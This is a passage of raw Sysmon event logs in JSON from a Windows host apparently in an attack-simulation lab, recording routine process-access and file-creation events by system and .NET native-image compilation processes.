C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.825","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-00102AAC1200}","TargetProcessId":"4648","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8038,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.840\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-00102AAC1200}\r\nTargetProcessId: 4648\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.840","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-00102AAC1200}","TargetProcessId":"4648","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8039,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.887\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-0010EFA31000}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.887","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-0010EFA31000}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8040,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.887\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-0010EFA31000}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.887","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-0010EFA31000}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8041,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:30.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CB-5F25-0000-0010EFA31000}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:30.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CB-5F25-0000-0010EFA31000}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8042,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:31.043\r\nProcessGuid: {A837DB8D-04FE-5F25-0000-0010E2AF1200}\r\nProcessId: 3000\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb8-0\\XsdBuildTask.dll\r\nCreationUtcTime: 2020-08-01 06:00:31.043","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:31.043","ProcessGuid":"{A837DB8D-04FE-5F25-0000-0010E2AF1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb8-0\\XsdBuildTask.dll","CreationUtcTime":"2020-08-01 06:00:31.043","EventReceivedTime":"2020-08-01 06:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8043,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.215\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010CD2D0B00}\r\nSourceProcessId: 4688\r\nSourceThreadId: 4668\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44545147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.215","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010CD2D0B00}","SourceProcessId":"4688","SourceThreadId":"4668","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44545147)","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8044,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8045,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.215\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010162F0B00}\r\nSourceProcessId: 2996\r\nSourceThreadId: 3764\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.215","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010162F0B00}","SourceProcessId":"2996","SourceThreadId":"3764","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8046,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.231\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-04FF-5F25-0000-001042D41200}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.231","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-04FF-5F25-0000-001042D41200}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8047,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:31.231\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-04FF-5F25-0000-001042D41200}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 